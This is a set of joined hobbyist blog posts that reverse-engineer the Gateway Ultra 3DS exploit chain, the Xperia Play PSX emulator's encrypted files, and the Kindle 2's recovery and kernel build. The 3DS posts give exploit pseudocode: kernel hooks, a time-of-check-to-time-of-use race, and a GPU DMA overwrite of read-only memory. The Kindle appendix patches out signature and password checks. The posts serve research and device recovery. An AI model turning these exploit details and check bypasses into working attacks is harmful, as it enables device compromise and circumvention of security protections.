Reversing Gateway Ultra Stage 3: Owning ARM9 Kernel

First, some background: the 3DS has two main processors. Last time, I went over how Gateway Ultra exploited the ARM11 processor. However, most of the interesting (from a security perspective) functionalities are handled by a separate ARM946 processor. The ARM9 processor is in charge of the initial system bootup, some system services, and most importantly all the cryptographic functions such as encryption/decryption and signature/verification. In this post, we will look at how to run (privileged) code on the ARM9 processor with privileged access to the ARM11 processor. Please note that this writeup is a work in progress as I have not completely figured out how the exploit works (only the main parts of it). Specifically there are a couple of things that I do not know if it is done for the sake of the exploit or if it is done purely for stability or obfuscation. From a developer’s perspective, it doesn’t matter because as long as you perform all the steps, you will achieve code execution. But from a hacker’s perspective, the information is not complete unless all aspects are known and understood. I am posting this now as-is because I do not know when I’ll have time to work on the 3DS again. However, when I do, I will update the post and hopefully clear up all confusion.

Code

For simplicity in description, from this point on, I will use pointers and offset values specific to the 4.x kernel. However, the code is the same for all firmware versions.

void arm11_kernel_entry(void) // pointers specific to 4.x
{
  int (*sub_FFF748C4)(int, int, int, int) = 0xFFF748C4;

  __clrex(); // release any exclusive access
  memcpy(0xF3FFFF00, 0x08F01010, 0x1C);// copy GW specific data
  invalidate_dcache();
  invalidate_icache();
  clear_framebuffer(); // clear screen and saves some GPU registers
  // ARM9 code copied to FCRAM 0x23F00000
  memcpy(0xF3F00000, ARM9_PAYLOAD, ARM9_PAYLOAD_LEN);
  // write function hook at 0xFFFF0C80
  memcpy(0xEFFF4C80, jump_table, FUNC_LEN);
  // write FW specific offsets to copied code buffer
  *(int *)(0xEFFF4C80 + 0x60) = 0xFFFD0000; // PDN regs
  *(int *)(0xEFFF4C80 + 0x64) = 0xFFFD2000; // PXI regs
  *(int *)(0xEFFF4C80 + 0x68) = 0xFFF84DDC; // where to return to from hook
  // patch function 0xFFF84D90 to jump to our hook
  *(int *)(0xFFF84DD4 + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFF84DD4 + 4) = 0xFFFF0C80; // jump_table + 0
  // patch reboot start function to jump to our hook
  *(int *)(0xFFFF097C + 0) = 0xE51FF004; // ldr pc, [pc, #-4]
  *(int *)(0xFFFF097C + 4) = 0x1FFF4C84; // jump_table + 4
  invalidate_dcache();
  sub_FFF748C4(0, 0, 2, 0); // trigger reboot
}

// not called directly, offset determines jump
void jump_table(void)
{
  func_patch_hook();
  reboot_func();
}

void func_patch_hook(void)
{
  // data written from entry
  int pdn_regs;
  int pxi_regs;
  int (*func_hook_return)(void);

  // save context
  __asm__ ("stmfd sp!, {r0-r12,lr}")
  // TODO: Why is this needed?
  pxi_send(pxi_regs, 0);
  pxi_sync(pxi_regs);
  pxi_send(pxi_regs, 0x10000);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  pxi_recv(pxi_regs);
  // TODO: What does this do?
  *(char *)(pdn_regs + 0x230) = 2;
  for (i = 0; i < 16; i += 2); // busy spin
  *(char *)(pdn_regs + 0x230) = 0;
  for (i = 0; i < 16; i += 2); // busy spin
  // restore context and run the two instructions that were replaced
  __asm__ ("ldmfd sp!, {r0-r12,lr}\t\n"
           "ldr r0, =0x44836\t\n"
           "str r0, [r1]\t\n"
           "ldr pc, %0", func_hook_return);
}

// this is a patched version of function 0xFFFF097C
// stuff found in the original code are skipped
void reboot_func(void)
{
  ... // setup
  // disable all interrupts
  __asm__ ("mrs r0, cpsr\t\n"
           "orr r0, r0, #0x1C0\t\n"
           "msr cpsr_cx, r0" ::: "r0");
  while ( *(char *)0x10140000 & 1 ); // wait for powerup ready
  *(void **)0x2400000C = 0x23F00000; // our ARM9 payload
  ...
}

Memory Configurations

A quick side-note on the way that ARM11 talks to ARM9. There is a FIFO with a register interface called the PXI and is used to pass data to and from each processor. Additionally, most of the physical memory mappings are shared between the two processors. Data stored, for example, in the FCRAM or AXI WRAM can be seen by both processors (provided proper cache coherency). However, there is one region (physical 0x08000000 to 0x081000000) that only the ARM9 processor can see. ARM9 code runs in this region. Another thing to note is that the ARM9 processor only performs a one-to-one virtual memory addressing (aka physical addresses and virtual addresses are the same) but I have been told that it does have memory protection enabled.

ARM9 Process

The ARM9 processor only (ever) has one process running, Process9, which speaks with the kernel to handle commands from ARM11. Process9 has access to a special syscall 0x7B, which takes in a function pointer and executes it in kernel mode. This means that essentially, owning ARM9 usermode is enough to get kernel code execution without any additional exploits.

Exploit Setup

After doing some housekeeping, the first thing the second stage payload code does is copy the third stage ARM9 code to a known location in FCRAM. Next, it makes patches to two ARM11 kernel functions. First, it patches the function at 0xFFF84D90 (I believe this function performs the kernel reboot) to jump into a function hook early-on. Second, it patches the function at 0xFFFF097C (I believe this function is ran after the ARM11 processor resets) to jump into another function hook. These two hooks are the key to how the exploit works.

Soft Rebooting

The 3DS supports soft rebooting (resetting the processor state without clearing the memory) in order to switch modes (ex: for DS games) and presumably to enable entering and exiting sleep mode. I believe this is triggered at the end of the the exploit setup by calling the function at 0xFFF748C4. At some point in this function, the subroutine at 0xFFF84D90 is called, which runs the code in our first function hook before continuing the execution.

At the same time in the ARM9 processor, Process9 now waits for a special command, 0x44836 from PXI, in the function at 0x0807B97C. I believe that the first function hook in ARM11 sends a series to commands to put Process9 into function 0x0807B97C, however that is only a guess.

The ARM11 processor continues to talk with ARM9 through the PXI and at some point both agree on a shared buffer in FCRAM at 0x24000000 (EDIT: yellows8 says this is the FIRM header) where some information is stored. At 0x2400000C is a function pointer to what ARM9 should execute after the reset. Process9 verifies that this function pointer is in the ARM9 private memory region 0x08000000-0x08100000 (EDIT: I assume the FIRM header signature check also takes place at this point). ARM11 resets and spinlocks in the function at 0xFFFF097C to wait for ARM9 to finish its tasks and tell ARM11 what to do.

Process9 at this point uses SVC 0x7B to jump into some reset handler at 0x080FF600 in kernel mode. At the end of that function, the ARM9 kernel reads the pointer value at 0x2400000C and jumps to it.

Reset ToCTToU

The problem here is simple. Process9 checks that the data at 0x2400000C (which is FCRAM, shared by both processors) is a valid pointer to code in ARM9 private memory (that ARM11 cannot access). However, after the check passes and before the function pointer is used, ARM11 can overwrite the value to point to code in FCRAM and ARM9 will execute it when it resets. This time-of-check-to-time-of-use bug is made possible by patching the ARM11 function that runs after reset so that it can wait for the right signal and then quickly overwrite the data in FCRAM before ARM9 uses it.

Conclusions

I apologize for the vagueness and likely mistakes in parts. I hope that if I don’t have the time to finish this analysis, someone else can pick up where I left off. Specifically, there are a couple of main questions that I haven’t answered:

  1. What is the function at 0xFFF748C4, what do the arguments do, and how does it call into function 0xFFF84D90? I speculate that it’s a function that performs the reset, but a more precise description is needed.
  2. What is the purpose of the first function hook? Specifically why does it send 0 and 0x10000 through PXI and what does PDN register 0x230 do?
  3. How does Process9 enter function 0x0807B97C? I suspect that it may have something to do with the first function hook in ARM11.

I hope that either someone can answer these questions (as well as correct any mistakes I’ve made) or that I’ll have time in the future to continue this analysis. This will also be the end of my journey to reverse Gateway Ultra (but the next release may spark my interest again). I don’t particularly care about the later stages (I hear there’s a modified MIPS VM and timing based obfuscation) or how Gateway enforces DRM to make sure only their card is used. If I do any more reversing with the 3DS, it would be on the kernel and applications so I can make patches of my own instead of worrying about how Gateway does it.

At this point, the information should be enough for anyone to take complete control of the 3DS (<= 9.2.0). I believe that information on its own is amoral but it takes people to make it immoral. There’s no point in arguing if piracy is right or wrong or if making this information public would help or harm pirates. I am not here to ensure the 3DS thrives. I am not here to take business away from Gateway. I am not here to be a moral police. I am only here to make sure that information is available for those who thirst for knowledge as much as I do in a form that is as precise and accurate as I can make it.

Reversing Gateway Ultra First Stage (Part 2)

When we last left off, we looked at the ROP code that loaded a larger second-part of the payload. Now we will walk through what was loaded and how userland native code execution was achieved. I am still an amateur at 3DS hacking so I am sure to get some things wrong, so please post any corrections you have in the comments and I will update the post as needed.

Pseudocode

Some of the hard coded addresses are inside the stack payload loaded by the first part from Launcher.dat (at 0x08F01000).

int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
void memcpy(void *dst, const void *src, unsigned int len);

// There are offsets and addresses specific to each FW version inside of 
// the first stage that is used by both the first and second stage payloads
struct // example for 4.1.0
{
    void (*payload_code)(void); // 0x009D2000
    unsigned int unk_4; // 0x252D3000
    unsigned int orig_code; // 0x1E5F8FFD
    void *payload_target; // 0x192D3000
    unsigned int unk_10; // 0xEFF83C97
    unsigned int unk_14; // 0xF0000000
    unsigned int unk_18; // 0xE8000000
    unsigned int unk_1C; // 0xEFFF4C80
    unsigned int unk_20; // 0xEFFE4DD4
    unsigned int unk_24; // 0xFFF84DDC
    unsigned int unk_28; // 0xFFF748C4
    unsigned int unk_2C; // 0xEFFF497C
    unsigned int unk_30; // 0x1FFF4C84
    unsigned int unk_34; // 0xFFFD0000
    unsigned int unk_38; // 0xFFFD2000
    unsigned int unk_3C; // 0xFFFD4000
    unsigned int unk_40; // 0xFFFCE000
} fw_specific_data;

void payload() // base at 0x08F01000
{
    int i;
    unsigned int kversion;
    struct fw_specific_data *data;
    int code_not_copied;

    // part 1, some setup
    *(int*)0x08000838 = 0x08F02B3C;
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    for (i = 0; i < 3; i++) // do 3 times to be safe
    {
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
    }

    kversion = *(unsigned int *)0x1FF80000; // KERNEL_VERSION register
    data = 0x08F02894; // buffer to store FW specific data

    // part 2, get kernel specific data from our buffer
    if (kversion == 0x02220000) // 2.34-0 4.1.0
    {
        memcpy (data, 0x08F028D8, 0x44);
    }
    else if (kversion == 0x02230600) // 2.35-6 5.0.0
    {
        memcpy (data, 0x08F0291C, 0x44);
    }
    else if (kversion == 0x02240000) // 2.36-0 5.1.0
    {
        memcpy (data, 0x08F02960, 0x44);
    }
    else if (kversion == 0x02250000) // 2.37-0 6.0.0
    {
        memcpy (data, 0x08F029A4, 0x44);
    }
    else if (kversion == 0x02260000) // 2.38-0 6.1.0
    {
        memcpy (data, 0x08F029E8, 0x44);
    }
    else if (kversion == 0x02270400) // 2.39-4 7.0.0
    {
        memcpy (data, 0x08F02A2C, 0x44);
    }
    else if (kversion == 0x02280000) // 2.40-0 7.2.0
    {
        memcpy (data, 0x08F02A70, 0x44);
    }
    else if (kversion == 0x022C0600) // 2.44-6 8.0.0
    {
        memcpy (data, 0x08F02AB4, 0x44);
    }

    // part 3, execute code
    do
    {
        // if the function has it's original code, we try again
        code_not_copied = *(unsigned int *)data->payload_code + data->orig_code == 0;
        // copy second stage to FCRAM
        memcpy (0x18410000, 0x08F02B90, 0x000021F0);
        // make sure data is written and cache flushed || attempted GW obfuscation
        memcpy (0x18410000, 0x18410000, 0x00010000);
        memcpy (0x18410000, 0x18410000, 0x00010000);
        GSPGPU_FlushDataCache (0x18410000, 0x000021F0);
        // copy the second stage code
        GX_SetTextureCopy (0x18410000, data->payload_target, 0x000021F0, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        memcpy (0x18410000, 0x18410000, 0x00010000);
    } while (code_not_copied);

    (void(*)() 0x009D2000)();
    // I think it was originally data->payload_code but later they hard coded it 
    // for some reason
}

Details

The first part, I’m not too sure about. I think it’s either some required housekeeping or needless calls to obfuscate the exploit (found later). I couldn’t find any documentation on the 0x1F4XXXXX region except that is it in the VRAM. (EDIT: plutoo tells me it’s the framebuffer. Likely the screen is cleared black for debugging or something.) I am also unsure of the use of setting 0x08000838 to some location in the payload that is filled with “0x002CAFE4″. In the second part, version specific information for each released kernel version is copied to a global space for use by both the first stage and the second stage exploit code. (This includes specific kernel addresses and stuff).

The meat of the exploit is an unchecked GPU DMA write that allows the attacker to overwrite read-only executable pages in memory. This is the same exploit used by smealum in his ninjhax and he gives a much better explanation of “gspwn” in his blog. In short, certain areas of the physical memory are mapped at some virtual address as read-only executable (EDIT: yellows8 tells me specifically, this is in a CRO, which is something like shared libraries for 3DS) but when the physical address of the same location is written to by the GPU, it does not go through the CPU’s MMU (since it is a different device) and can write to it. The need for thread sleep (and maybe the weird useless memcpys) is because the CPU’s various levels of cache needs some time to see the changes that it did not expect from the GPU.

The second stage of the payload is the ARM code copied from Launcher.dat (3.0.0) offset 0x1B90 for a length of 0x21F0 (remember to decrypt it using the “add”-pad stream cipher described in the first post).

Raw ROP Payload Annotated

It is a huge mess, but for those who are curious, here it is. The bulk of the code are useless obfuscation (for example, it would pop 9 registers full of junk data and then fill the same 9 registers with more junk data afterwards). However, the obfuscation is easy to get past if you just ignore everything except gadgets that do 1) memory loads, 2) memory stores, 3) set flags, or 4) function call. Every other gadget is useless. They also do this weird thing where they “memcpy” one part of the stack to another part (which goes past the current SP). However, comparing the two blocks of data (before and after the copy) shows nothing different aside from some garbage values.

Reverse engineering a dynamic library on the Xperia Play

Welcome to part two of my journey to completely reverse the PSX emulator on the Xperia Play. When we last left off, I managed to figure out the image.ps format and the basic order of execution of the emulator. It’s been a week now, and I have more stuff to reveal.

Decrypting the data

One of the main problems was that most of the important files are encrypted. More specifically, these three files: ps1_rom.bin (BIOS), libdefault.so (the emulator), and image_ps_toc (then unknown data). As I mentioned before, Sony used what’s called white box cryptography, which means obfuscating the code to hide the decryption keys. But, we don’t need the keys, we just need the decrypted data. The obvious way of extracting the decrypted data is dumping it from the RAM. However, the Android kernel I’m using doesn’t support reading /dev/kmem and I don’t want to mess with recompiling the kernel. I’ve also tried dumping with GDB, and it did work, but the data isn’t complete and is messy. I used a more unorthodox method of obtaining the decrypted data. After hours of reading and mapping in IDA Pro, I figured out that everything that is decrypted goes through one public function, uncompress(), a part of zlib. This is important, because this means everything that is decrypted is sent to zlib and zlib is open source. That means, I just need to recompile zlib with some extra code in uncompress() that will dump the input and output data. A simple fwrite() will do, as the data is already in a clean, memcpy-able form. (I forgot about LD_PRELOAD at the time, but that might have worked easier). After some trouble getting NDK to compile zlib, I have dumps of both the compressed/decrypted and uncompressed forms of all encrypted content.

Analyzing the dumps

The next thing is to find out the meaning of the data that we worked so hard to get. ps1_rom.bin is easy. Surprisingly, it is NOT a PS1 BIOS file, but actually part of a PS2 BIOS dump (part, being only the PS1 part of the PS2 BIOS). Does this mean a PS2 emulator is coming for the Play? I don’t know. Next, we have libdefault.so. Plugging it into IDA Pro reveals the juicy details of the PS1 emulator. It’s really nothing interesting, but if we ever want multi-disk support or decrypting the manuals, this would be the place to look. Finally, we have image_ps_toc (as it is called in the symbols file). I am actually embarrassed to say it took almost a day for me to figure out that it’s a table of contents file. I did guess so at first, but I couldn’t see a pattern, but after a night’s sleep, I figured out the format of the uncompressed image_ps_toc file. (Offsets are in hex, data are little-endian)

0x4 byte header

0x4 byte uncompressed image size

0x12 byte constant (I’m guessing it may have something to do with number of disks and where to cut off)

0x4 byte number of entries

Each entry:

0x4 byte offset in image.ps, where the compressed image is split

Image.ps format

I actually forgot to mention this in my last post. The “rom” that is loaded by the emulator is a file named image.ps. It is found on the SD card inside the ZPAK. It is unencrypted, and if you delete it, it will be downloaded again from Sony’s servers unencrypted. How it works is that an PSX ISO is taken and split into 0x9300 (about 38kb) sections, and each section is compressed using deflate (zlib again) and placed inside image.ps (with a 0x14 byte header). The offsets of each section is stored in the toc file (and encrypted) because although uncompressed, they’re perfect 38kb sections, compressed, they’re variable sized. I already wrote a tool to convert image.ps to an ISO and back again/

Putting it all back together

Now that we’ve tore apart, analyzed, and understood every element of the PSX emulator on the Xperia Play, what do we do? The ultimate goal is to convert any PSX game to run on the Xperia Play, but how do we do that. There are two main challenges. First of all, libjava-activity.so, which loads everything, expects data to be encrypted. Once again, we need keys. Also, I’m pretty sure it uses a custom encryption technique called “TFIT AES Cipher”, because I was not able to find information on it anywhere else. However, since we have the decrypted files, we can patch the library to load the decrypted files directly from memory, and I was halfway into doing that when I realized two more problems. Secondly, if I were to patch the library to load decrypted data, that means every user needs to decrypt the files themselves (because I won’t distribute copyrighted code). Third, image_ps_toc is variable sized, which means if the image is too big, it’ll break the offsets and refuse to load.

Currently, I’m trying to find the easiest and most legal way of allowing custom image_ps_toc files to work. (Bonus points if I can also load custom BIOS files). What I hope for is to write a wrapper library, libjava-activity-wrapper.so, which loads libjava-activity.so and patches GetImageTOC and GetImageTOCLength to load from a file instead of memory. This means I have to deal with Java and JNI again (ugh), and also do some weird stuff with pointers and memcpy (double ugh). The JNI methods in the library do not have their symbols exported, so I have to find a way of manually load them.

Bonus: blind patching a binary

When trying to patch a method for an ARM processor, it’s a bit of a pain and I’m too lazy to read about proper GDB debugging techniques. In additions, Sony wasn’t kind enough to compile everything with debugging symbols. However, I came up with a hacky-slashy way of changing instructions and seeing what happens. First, open up IDA Pro and find the function you want to modify. For example, I want decrypt_executable() to bypass decryption and just copy data plain. Find the instruction to change, and the opcode to change it to. For example, I want to change a BL instruction to NOP and CMP to CMN (don’t jump to decryption process and negate the “return == 0″). I have ARM’s NOP memorized by now 00 00 A0 E1. I don’t know what CMN’s opcode is, but if I look around I can find CMN somewhere and I see it’s just a change from a 7 to a 5. After everything’s done, copy it over to the phone and run it. If it crashes (and it should), look at the dump. The only important part is the beginning:

I/DEBUG   (  105): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000054
I/DEBUG   (  105):  r0 002d9508  r1 413c103c  r2 2afcc8d0  r3 002d93d8
I/DEBUG   (  105):  r4 00000004  r5 002d93e0  r6 6ca9dd68  r7 00000000
I/DEBUG   (  105):  r8 7e9dd478  r9 2cbffc70  10 0000aca0  fp 6caa4d48
I/DEBUG   (  105):  ip 002d93e8  sp 7e9dd0c0  lr 00000001  pc 4112d01c  cpsr 40000010

The error message doesn’t help at all “SIGSEGV,” but we have a dump of all the registers in the CPU. The important one is the PC (program counter), which shows what offset the last instruction was at offset 0x4112d01c in the memory. To get the program offset, just cat /proc/{pid}/maps to find where libjava-activity.so is loaded in memory. Subtract the offsets, and pop it into IDA pro. Now figure out why it crashed and try again. I need to learn proper debugging techniques one day.

Recovering a formatted or corrupt Kindle 2

One day, while playing around with a Kindle 2, I accidentally deleted the /lib folder. Oops. Now, no command beyond “ls” and “rm” work. If this was a computer, I could have simply inserted a installation DVD and copied the files over, but this was an eBook reader, and I was in for a world of pain. This was a month ago, and I’ve finally recovered the Kindle. I’m posting what I did online to save anyone else who’s in the same boat a ton of time. This tutorial is only designed for the Kindle 2, but it MAY work for the DX. It will NOT work for the Kindle 3, but directions should be similar.

 

First

If you’ve think you “bricked” your Kindle, don’t panic yet. There could be a easy solution. Chances are, if you can see the startup progress bar loading, the solution should be easier (although I can’t tell you exactly what your problem is). I would follow Amazon’s troubleshooting directions first. Only proceed if you are absolutely sure nothing else can be done.

Overview

Here’s what you’ll need

  1. TTL to RS232 or USB connector. I used this one. For that, use the jumper on pin 1 and 2 on the side (with the three pins, pin 1 is towards the USB port). Connect Kindle Tx -> Tx, Rx -> Rx, GND -> GND, VDD -> VDD
  2. Windows with HyperTerminal (I tried Kermit on Linux, but it couldn’t send files. HyperTerminal is the only program I’ve tested that works sending files to the Kindle)
  3. Linux or Unix-based computer with “dd” and “ssh”
  4. My custom recovery kernel which allows jailbreak signed recovery packages and exporting MMC0 without a password. If you want to know how I’ve made it in technical details, see the appendix.

Here’s what we’ll be doing:

  1. Attaching the recovery port
  2. Flashing the custom patched recovery kernel
  3. Obtaining a backup of Kindle system files
  4. Restoring your Kindle

Attaching the recovery port

First open up the Kindle 2 to reveal the PCB board. You should remove both the metal casing and the white plastic with all the screws. On the top, to the left of the headphone jack, you should see four pads labeled J4. Either solder (recommended) or tape (make sure it isn’t lose!) four wires to these pads. The order of these ports (left to right, where left is towards the volume switch) are: VDD, Rx, Tx, GND. Connect these lines to your TTL adapter and connect the adapter to your computer.

Flashing the custom patched recovery kernel

Open up HyperTerminal, and connect to your adapter. Make sure to click “Configure” and fill in the settings. The settings are: BPS: 115200, Data bits: 8, Parity: none, Stop bits: 1, Flow control: none. Then, restart your Kindle either by removing & reconnecting the battery, holding the sleep switch for 30 seconds, or tapping the reset switch on the PCB. Press Enter when text pops up in HyperTerminal. You only have one second, so be quick. In uBook, type in “run prg_kernel_serial” (make sure to type fast or uBoot will timeout). Then right click on the text, and choose “Send File”. Under protocol, choose Ymodem-G and for the file, select my custom kernel. Wait a few minutes for it to upload and install, then type in “bootm 0xa0060000″ to boot the kernel. The Kindle has two kernels that it alternates on each boot, so if you want to use my recovery kernel, you need to either flash the other kernel also or type in “bootm 0xa0060000″ into uboot on startup. Hold down Enter either on your computer or on the Kindle to enter the recovery menu. The recovery menu times out in 10 seconds, so you need to be quick. First type “I” to recreate all the partitions, then type “3” to export the MMC. Again, these can be typed from either your keyboard in HyperTerminal, or the Kindle keypad. If you do not have access to HyperTerminal because you are in Linux restoring, you can get back here by holding Enter on the Kindle keypad and pressing 3 on the recovery menu.

Obtaining a backup of Kindle system files

Let’s put your broken Kindle aside. You need a working copy of Kindle’s system files. I cannot provide this for legal reasons, but if you obtain another Kindle 2 (preferably the same model and version as your broken one, but others MAY work [not Kindle 3 though… yet]), jailbreak it and install the usbNetwork hack for SSH access. Make sure that Kindle has at least 500MB of free space on the FAT partition to store the backup image. Once you SSH’d into the working Kindle (there are tons of tutorials around on this), issue the following command:

dd if=/dev/mmcblk0p1 of=/mnt/us/rootfs.img bs=1024

Note that this will only make a copy of the OS files. All personal information, passwords, books, etc are not copied. You can tell your friend that. This may take five to fifteen minutes to run, but when the command returns with the blocks written, you can disable usbNetwork and enable USB storage again. Copy the rootfs.img file over to your recovery computer and prepare to restore.

Restoring your Kindle

Back to your broken Kindle. You need to reformat the root and copy over the backup files. I moved the Kindle over to a Linux computer because it is easier. You can also use OSX or maybe even cygwin, but I haven’t tested. In shell, type in the following commands:

sudo su # Become root, so you don’t need to sudo everything

fdisk -l # Look for your Kindle’s identifier, it should be something like /dev/sdc, it should be a 2GB drive with 4 partitions. I will use /dev/sdX to represent this drive

mkfs.ext3 /dev/sdX2 # Make a ext3 partition for /var/local

dd if=/path/to/rootfs.img of=/dev/sdX1 bs=1MiB # This will take a long time to finish

Note that an alternative method is to gzip rootfs.img and place it into a recovery package created using kindle_update_tool.py, but I’ll leave that as an exercise for the reader.

Appendix

So, what is in the magical Kindle recovery kernel? It’s actually just a regular Kindle kernel recompiled with a modified initramfs with a patched recovery script. Using the regular kernel, you’ll run into two difficulties when trying to recover. First, if you press 3 to export MMC0, you’ll get a password prompt. Good luck brute forcing it. Second, if you build a custom recovery package using kindle_update_tool.py m –k2 –sign –fb, it will not work because of signature checks. What I did was patch the two checks.

First, I extracted the recovery-utils file by gunzipping uImage (with the extra stuff stripped out), and gunzipped initramfs.cpio from that. Then I extracted initramfs.cpio and found recovery-utils under /bin.

Next, the easy part is patching the updater package signature checks. What I did is extract the updater RSA public key file from the Kindle, found under /etc/uks and used OpenSSL to extract the public key from it (n and e). Then I opened recovery-utils with a hex editor, searched for the public key, and replaced it with the jailbreak key (found in kindle_update_tool.py).

Finally, the challenging part was to patch the password check from export MMC0. First I opened recovery-utils with IDA Pro. Then I located the check_pass function. I worked backwards from that and saw it was called from loc_94A8. Here’s a snippet of the check along with my interpretation of what it does:

BL check_pass # Call the check_pass function

CMP R0, #0 # check_pass sets register R0 with the return value, we will check if R0 equals 0x0

BEQ loc_9604 # If the previous instruction is true, then password check has failed

LDR R0, =aDevMmcblk0 ; “/dev/mmcblk0″ # We did not jump out, so CMP R0, #0 is false

BL storage_export # Call this function

It’s always easy to patch the least amount of instructions with the least amount of changes, so this is what I did. (Note that IDA Pro doesn’t allow editing instructions directly, so I have to find the machine code in hex to know what to replace. Luckily, I have tons to instructions to look at and see what their corresponding machine codes are).

NOP # Instead of calling check_pass, I did MOV R0, R0 which is the same as NOP

CMN R0, R0 # Negative compare R0 with itself. Basically, always return false.

… rest is the same

Now, I saved the file and luckily, it was the same size. So I didn’t have to recreate the initramfs.cpio, I just replaced the file inside with my hex editor (note that cpio files do not have checksum checks unlike tar files). I copied this to the kernel source folder and compiled the kernel. Lucky for you, I have already done all of this so you don’t have to.

Compiling the Linux kernel for Amazon Kindle

So, I recently bought a Kindle 2. As usual, the minute it arrived, I ripped it apart, poked every chip, and then started to reverse engineer the damn thing. Wait. I didn’t have to! I found this out days late, after messing with IDA Pro. Amazon has generously released most of the back end code for the Kindle as open source. (The front end, aka the stuff you see, is written in Java and we might get to that another day). So I decided to compile my own Kindle kernel. Why? Why not. Here’s how:

Part 1: Prerequisites

  • Get a root shell of your Kindle. If you don’t know, Google “usbNetworking”
  • A Linux computer for compiling code
  • Amazon’s sources for your version of the Kindle: http://www.amazon.com/gp/help/customer/display.html?nodeId=200203720
  • An ARM cross-compiler. You can compile Amazon’s code, or if you’re lazy, use CodeSourcery’s precompiled toolchain: http://www.codesourcery.com/sgpp/lite/arm
  • The following packages, get them from your distro’s repo: libncurses-dev (for menuconfig), uboot-mkimage (for making the kernel image), and module-init-tools (depmod)

Part 2: Compiling the kernel

  1. Extract the source to anywhere. If you can’t decide, use “~/src/kernel/” and “cd” to the source files.
  2. Now, you need to configure for the Kindle, type “make mario_mx_defconfig
  3. Edit the “.config” file and look for the line that starts with “CONFIG_INITRAMFS_SOURCE“. We don’t need that, delete that line or comment (#) it out.
  4. Here’s the part were you make all your modifications to the kernel. You might want to do “make menuconfig” and add extra drivers/modules. I’ll wait while you do that.
  5. Back? Let’s do the actual compiling. Type the following: “make ARCH=arm CROSS_COMPILE=~/CodeSourcery/Sourcery_G++_Lite/bin/arm-none-linux-gnueabi- uImage”. This will make the kernel image. I assume you installed CodeSourcery’s cross compiler to your home folder (default). If your cross compiler is elsewhere, change the command to match it.
  6. Compile the modules into a compressed TAR archive (for easy moving to the kindle): “make ARCH=arm CROSS_COMPILE=~/CodeSourcery/Sourcery_G++_Lite/bin/arm-none-linux-gnueabi- targz-pkg” (again, if your cross compiler is installed to a different location, change it).
  7. For some reason, depmod refuses to run with the compile script, so we’re going to do it manually. Do the following “depmod -ae -F System.map -b tar-install -r 2.6.22.19-lab126 -n > modules.dep” Change 2.6.22.19-lab126 to your compiled kernel version.
  8. Open modules.dep up with a text editor and do a search & replace. Replace all instances of “kernel/” with “/lib/modules/2.6.22.19-lab126/kernel/” (again, use your version string). I’m not sure this is needed, but better safe then brick.
  9. Now copy arch/arm/boot/uImage, linux-2.6.22.19-lab126.tar.gz (or whatever your version is), and modules.dep to an easy to access location.

Part 3: Installing on Kindle

  1. Connect the Kindle to your computer, and open up the storage device. Copy the three files you moved from the previous part to your Kindle via USB.
  2. This part is mostly commands, so get a root shell to your Kindle, and do the following commands line by line. Again, anywhere the version string “2.6.22.19-lab126” is used, change it to your kernel’s version. Explanation follows.

mv /mnt/us/linux-2.6.22.19-lab126.tar.gz /mnt/us/modules.dep /mnt/us/uImage /tmp

mv /lib/modules /lib/modules.old

cd /tmp & tar xvzf /tmp/linux-2.6.22.19-lab126.tar.gz

mv lib/modules /lib/

chmod 644 modules.dep

mv modules.dep /lib/modules/2.6.22.19-lab126/

/test/flashtools/update-kernel-both uImage

sync

shutdown -r now

Wow, that’s a lot of commands. What did that do? Well, line by line:

  1. Move the files we compiled to the temp folder. That way, we don’t have to clean up.
  2. Back up the old kernel modules
  3. Go to the temp folder and untar the modules
  4. Install the modules
  5. Correct the permissions for the modules.dep file (in case something happened after copying from your computer)
  6. Move the module dependencies list to it’s correct folder.
  7. Flash the kernel (I don’t know why it has to be flashed twice to two different partitions, but if you don’t, it won’t load, maybe sig checks?)
  8. Make sure everything is finished writing
  9. Reboot